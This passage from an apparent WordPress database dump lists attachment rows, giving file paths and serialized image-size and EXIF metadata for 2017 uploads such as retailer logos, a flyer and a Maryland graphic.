2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Fenise-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:18:\"Fenise-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4129,1061,'_wp_attached_file','2017/01/SylviaD.png'),(4130,1061,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2017/01/SylviaD.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"SylviaD-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:19:\"SylviaD-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4131,1062,'_wp_attached_file','2017/01/MAC.png'),(4132,1062,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:15:\"2017/01/MAC.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"MAC-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:15:\"MAC-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4133,1063,'_wp_attached_file','2017/01/Claires.png'),(4134,1063,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2017/01/Claires.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Claires-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:19:\"Claires-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4135,1064,'_wp_attached_file','2017/01/CharlotteRuss.png'),(4136,1064,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:25:\"2017/01/CharlotteRuss.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"CharlotteRuss-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"CharlotteRuss-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4137,1065,'_wp_attached_file','2017/01/SYNCHBOUTIQUE.png'),(4138,1065,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:25:\"2017/01/SYNCHBOUTIQUE.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"SYNCHBOUTIQUE-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"SYNCHBOUTIQUE-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4139,1066,'_wp_attached_file','2017/01/JazzyJazmine.png'),(4140,1066,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:24:\"2017/01/JazzyJazmine.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"JazzyJazmine-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:24:\"JazzyJazmine-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4141,1067,'_wp_attached_file','2017/01/Starbucks.png'),(4142,1067,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:21:\"2017/01/Starbucks.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Starbucks-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"Starbucks-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4143,1068,'_wp_attached_file','2017/01/MAC-1.png'),(4144,1068,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:17:\"2017/01/MAC-1.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"MAC-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:17:\"MAC-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4145,1069,'_wp_attached_file','2017/01/Claires-1.png'),(4146,1069,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:21:\"2017/01/Claires-1.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Claires-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"Claires-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4147,1070,'_wp_attached_file','2017/01/Sephora.png'),(4148,1070,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2017/01/Sephora.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Sephora-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:19:\"Sephora-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4149,1071,'_wp_attached_file','2017/01/CharlotteRuss-1.png'),(4150,1071,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:27:\"2017/01/CharlotteRuss-1.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"CharlotteRuss-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:27:\"CharlotteRuss-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4151,1072,'_wp_attached_file','2017/01/ALDO.png'),(4152,1072,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:16:\"2017/01/ALDO.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"ALDO-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:16:\"ALDO-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4153,1073,'_wp_attached_file','2017/01/Nordstrom.png'),(4154,1073,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:21:\"2017/01/Nordstrom.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Nordstrom-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"Nordstrom-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4155,1074,'_wp_attached_file','2017/01/CCSC.png'),(4156,1074,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:16:\"2017/01/CCSC.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"CCSC-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:16:\"CCSC-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4157,1075,'_wp_attached_file','2017/01/chcares.png'),(4158,1075,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2017/01/chcares.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"chcares-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:19:\"chcares-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4159,1076,'_wp_attached_file','2017/01/Sweets.png'),(4160,1076,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:18:\"2017/01/Sweets.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Sweets-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:18:\"Sweets-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4161,1077,'_wp_attached_file','2017/01/Icing.png'),(4162,1077,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:17:\"2017/01/Icing.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"Icing-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:17:\"Icing-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4167,1085,'_wp_attached_file','2017/05/image2.jpg'),(4168,1085,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:966;s:6:\"height\";i:1288;s:4:\"file\";s:18:\"2017/05/image2.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"image2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"image2-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"image2-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"image2-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"image2-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:18:\"image2-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:18:\"image2-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:18:\"image2-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"iPhone 6s Plus\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1494838283\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"2.65\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(4478,1193,'_wp_attached_file','2017/10/IMG_1219.png'),(4456,1183,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1400;s:6:\"height\";i:933;s:4:\"file\";s:29:\"2017/09/State-of-Maryland.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"State-of-Maryland-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"State-of-Maryland-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"State-of-Maryland-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"State-of-Maryland-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"State-of-Maryland-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:29:\"State-of-Maryland-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:29:\"State-of-Maryland-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:29:\"State-of-Maryland-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4455,1183,'_wp_attached_file','2017/09/State-of-Maryland.png'),(4448,1179,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:25:\"2017/01/Soror-Conway1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Soror-Conway1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Soror-Conway1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:25:\"Soror-Conway1-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:25:\"Soror-Conway1-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"Soror-Conway1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4231,1116,'_wp_attached_file','2017/08/Informational-Flyer.png'),(4232,1116,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2550;s:6:\"height\";i:3300;s:4:\"file\";s:31:\"2017/08/Informational-Flyer.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"Informational-Flyer-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"Informational-Flyer-232x300.png\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"Informational-Flyer-768x994.png\";s:5:\"width\";i:768;s:6:\"height\";i:994;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"Informational-Flyer-791x1024.png\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:31:\"Informational-Flyer-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:31:\"Informational-Flyer-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:31:\"Informational-Flyer-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:31:\"Informational-Flyer-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4244,1121,'_wp_attached_file','2017/09/Award-Winning.png'),(4245,1121,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1400;s:6:\"height\";i:933;s:4:\"file\";s:25:\"2017/09/Award-Winning.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Award-Winning-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Award-Winning-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Award-Winning-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\